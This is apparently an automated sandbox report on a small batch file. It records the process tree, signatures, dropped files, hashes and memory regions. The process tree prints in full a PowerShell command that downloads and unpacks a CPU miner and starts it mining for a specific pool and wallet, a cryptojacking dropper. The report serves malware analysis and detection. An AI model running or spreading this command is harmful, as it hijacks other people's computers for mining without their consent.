b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1798s
max time network
1795s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
04/02/2024, 03:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	3940	powershell.exe
7	3940	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3436	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3436	cpuminer-sse2.exe
3436	cpuminer-sse2.exe
3436	cpuminer-sse2.exe
3436	cpuminer-sse2.exe
3436	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3940	powershell.exe
3940	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3940	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5408 wrote to memory of 3940	5408	cmd.exe	85
PID 5408 wrote to memory of 3940	5408	cmd.exe	85
PID 3940 wrote to memory of 5976	3940	powershell.exe	93
PID 3940 wrote to memory of 5976	3940	powershell.exe	93
PID 5976 wrote to memory of 3436	5976	cmd.exe	95
PID 5976 wrote to memory of 3436	5976	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3436

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yhyvhodc.2ja.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
327KB

MD5
42556778de742994225133be9f1de32b

SHA1
bd13180f3ae9423cd1ce3cf768e284e2e6529bd3

SHA256
c2e9147588abb9b651b26b50a95dc47bae3dd7bdd039981e088ceb0a6ce24974

SHA512
265d0e8594d6cb47504f1cf7af0c61f55808bed7f41904a03170c92731c4970caf08e5cb5dd13a2c7aaa50c984f6d9d682b296e6fc7762ebcccf984a336a9be5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
378KB

MD5
a32014c3498d3d5c5baa6ff3e1653bd4

SHA1
0c7d420d135c3167d3f0cbd28c06428f664eea9b

SHA256
d23dd879d771f0622b042024b8909a9eb98af66f66b0be42369aa4ad959de731

SHA512
d43c80bb4ec4e3239670827c71d217d330ea85ef737fe620cc6c7b7a6ae12ed7a45ff6bfb68a66fbf67136911c24b58cb78d22b5360c3b5dfaaab234c0fabf94

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
264KB

MD5
41e528f64d982cbe5d81681aa305d855

SHA1
cd7df731161f8d6769fc61aeacf075e0037737bb

SHA256
2f8ff4e585b8ce8e5d106d90e6582612cc739d207166071cc6aafab2b78ea3cf

SHA512
c928a8bc04785c7df2224148106aa2eaa548dd806fa0971ea33f5165d915f413a97d063b7fc6b6bbf514d59ade86ed6351a917b2879959b3e6da06de3d913285

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
362KB

MD5
3d8fffab7b713fc5c02046aae1b50a2a

SHA1
ec9977ed1f079d6294a6c7b3ab912321db79b7a1

SHA256
4140d093bec689e55b7aede1791f888efb22c4449551d6d51d173c5f5bf579b1

SHA512
95ef5072539c2396002f15d9198cf565819eb3d273202b1b1acef40017c15ddbace2862a7ad6a439c1776aba05f29cda1f4a043de67f887c0117b46937fb93b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
365KB

MD5
8b65ca3a5face4ce970d8015e3e9f618

SHA1
4283eb59889be472ca0c760482bfb01373a389b8

SHA256
58956689dfa95434020049edcb4015594ee021dedefa334e0b989754c5f823af

SHA512
8528e48013f021f2abeaccd15b364f180c9d77428bd945a427780afa925c88edd91c190e06f3de1d8d7a268b66bc230e90c8d2dc4afc82cd800a794ee8882555

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
820KB

MD5
db20fef366c023cd1449339eb02d9fc9

SHA1
e4619d0a78520ce08662a771ca17ba21f7811614

SHA256
4a7fc553908020ccc5f5d11edb0f4e844b88712bf534284d09370e160c68901e

SHA512
2e6cf43360b63d4bdc3da0de259c5fca3c4bee64e3530fa83f35580b55f93a86c41ae336a54f64045b2087bf6fdcd3082037339092e82be78e4ebe668a3c2522

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
571KB

MD5
9d15973dec714e1fd6d204b075d8a359

SHA1
6eec26f3999e2a94f198be736d53cc161f266771

SHA256
278d47d23fb755e87d0810fb2cfefc0b3d0cf8795f0aabc9844b7bf1ecfebf58

SHA512
96ef600a313e88e7f5355de40c88ccee8e9e6b8a5f54a94e11ec72ee9b995bf4c2f34f232f54ffe98649bfb922d96a8a2e313b8d23a3689f1c3bd440587db908

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
280KB

MD5
c7dfc27725f647037258da2252169de3

SHA1
9fdda0dfaaf9ea439770cd3791ed38ad8faaccf8

SHA256
b04399fca6da44254c88bf4a4e50095818a919665b2c8af57864325a20a6bba6

SHA512
86c7dd4fa0e4372d884c20f15a1a22abf76b3d693a5488f86d9edec4bd1576670e8345824467efd65306882381fc5a96b561741acbfb43d79faf82a9f825d05e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
330KB

MD5
67af2ad86681f3b8553910abdb6e0a0b

SHA1
8b8f8b8b3dcde6141c51c18a173b19dc3a8ba5ca

SHA256
b706436a5a9eb0a40aa53f5b329330cab6d2ffaa7b86ca694df49d55c1df52a7

SHA512
55228fb2a586d1180993616938aea0f665cbc34232d859c6b4a08d1917ac3c6cffd2fd51eb38a0a7aa52f7a8af66698c9ba99fc785147323fb8ed6b99a989495

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
410KB

MD5
c819507b92320a0be7c43099bd874696

SHA1
f7e840f8a032ab8843535439edeab84978a6318f

SHA256
204896f9ae4a770e45c8d47869d7485d0035a1affe5b7f46a49cd82e4be39cfa

SHA512
2adca3679739c6045247cf14fe118d7a4c31fc5638264a20ca9df22245624ff8eb8892e0afb62bae223bda5914d504cb6d38d1524e243465287f6f31e0e681ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
421KB

MD5
ce6b2e791656f72671c3f5a91a07da09

SHA1
352cbcdb2f204403ad29aa3ff036468785c02809

SHA256
40fa1f9ffc7992624fb479b1a5b7d18cf20a16d8e2cf9caadbf2fb053fbb900b

SHA512
59351979fd1f10b1b0c45c92bff6817aeddf02c4010312383868397832baa201e426f0c520b04760cf6a5e0cd755609fe80a5043069ee9fef18f768f53c9562c

Download Submit
memory/3436-77-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/3436-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-133-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-118-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3436-74-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3436-75-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3436-76-0x0000000054CD0000-0x0000000054D68000-memory.dmp

Filesize
608KB

Download
memory/3940-16-0x000001E15AAD0000-0x000001E15AAE6000-memory.dmp

Filesize
88KB

Download
memory/3940-15-0x000001E15ADC0000-0x000001E15AECE000-memory.dmp

Filesize
1.1MB

Download
memory/3940-12-0x000001E158970000-0x000001E158980000-memory.dmp

Filesize
64KB

Download
memory/3940-13-0x000001E15AA10000-0x000001E15AA20000-memory.dmp

Filesize
64KB

Download
memory/3940-0-0x000001E15AB10000-0x000001E15ABA2000-memory.dmp

Filesize
584KB

Download
memory/3940-14-0x000001E158970000-0x000001E158980000-memory.dmp

Filesize
64KB

Download
memory/3940-7-0x00007FF999E40000-0x00007FF99A901000-memory.dmp

Filesize
10.8MB

Download
memory/3940-8-0x000001E15AAA0000-0x000001E15AAC2000-memory.dmp

Filesize
136KB

Download
memory/3940-21-0x000001E15AAF0000-0x000001E15AB02000-memory.dmp

Filesize
72KB

Download
memory/3940-17-0x00007FF999E40000-0x00007FF99A901000-memory.dmp

Filesize
10.8MB

Download
memory/3940-18-0x000001E158970000-0x000001E158980000-memory.dmp

Filesize
64KB

Download
memory/3940-20-0x000001E158970000-0x000001E158980000-memory.dmp

Filesize
64KB

Download
memory/3940-22-0x000001E15AA90000-0x000001E15AA9A000-memory.dmp

Filesize
40KB

Download
memory/3940-60-0x00007FF999E40000-0x00007FF99A901000-memory.dmp

Filesize
10.8MB

Download